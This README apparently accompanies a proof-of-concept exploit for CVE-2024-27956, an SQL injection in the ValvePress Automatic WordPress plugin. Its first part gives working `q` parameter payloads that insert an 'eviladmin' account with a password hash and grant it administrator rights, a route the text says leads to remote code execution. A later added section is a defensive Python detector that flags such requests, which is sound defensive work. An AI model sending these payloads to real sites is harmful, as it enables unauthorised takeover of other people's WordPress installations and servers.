# CVE-2024-27956-RCE
A PoC for CVE-2024-27956, a SQL injection in the ValvePress Automatic plugin. This PoC exploits the vulnerability by creating a user on the target and giving it Administrator rights. Being an administrator in WordPress can lead to Remote Code Execution.


```
git clone
cd CVE-2024-27956-RCE
```

SQL Injection payload to create a user:

```
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '', '', '2024-04-30 16:26:43', 0, 'eviladmin')
```

Giving admin rights:

```
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}
```

The `q` parameter accepts an entire SQL query, which is then executed.

The user input is executed directly without any kind of restriction or sanitization.
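
A defender-side check for the traffic described above, as an added example that is not part of the original PoC: it parses a form-encoded request body and flags a `q` value that carries a full SQL statement, writes to a users or usermeta table, or sets administrator capabilities. The function name, the sample bodies and the assumption that `q` arrives form-encoded are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# q starts with a SQL verb, i.e. the client is sending a whole statement.
SQL_STATEMENT = re.compile(
    r"\s*(select|insert|update|delete|replace|drop|alter|create)\b", re.IGNORECASE)
# Writes to the account tables the page's payloads target. The table prefix
# (wp_ by default) can differ per site, so any prefix is accepted (assumption).
WRITE_TO_AUTH_TABLE = re.compile(
    r"\b(?:insert\s+into|replace\s+into|update|delete\s+from)\s+`?\w*(users|usermeta)`?\b",
    re.IGNORECASE)
# A capabilities meta value naming the administrator role.
ADMIN_GRANT = re.compile(r"capabilities.{0,80}administrator", re.IGNORECASE | re.DOTALL)


def inspect_body(body: str) -> list[str]:
    """Return the reasons a form-encoded body looks like SQL passed through q."""
    reasons = []
    for q in parse_qs(body, keep_blank_values=True).get("q", []):
        if SQL_STATEMENT.match(q):
            reasons.append("q holds a full SQL statement")
        table = WRITE_TO_AUTH_TABLE.search(q)
        if table:
            reasons.append(f"q writes to a {table.group(1).lower()} table")
        if ADMIN_GRANT.search(q):
            reasons.append("q sets administrator capabilities")
    return reasons


# Constructed sample request bodies (not captured traffic).
SAMPLES = {
    "create_user": urlencode({"q": "INSERT INTO wp_users (user_login, display_name) "
                                   "VALUES ('example', 'example')"}),
    "grant_admin": urlencode({"q": "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) "
                                   "VALUES (1, 'wp_capabilities', "
                                   "'a:1:{s:13:\"administrator\";s:1:\"1\";}')"}),
    "benign": urlencode({"q": "weekly report", "page": "2"}),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

A free-text `q` that happens to begin with a word such as "select" triggers the first rule alone; the table-write and capabilities rules are the higher-confidence signals.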

<a href=""><img src="Screenshot_2.png"></a>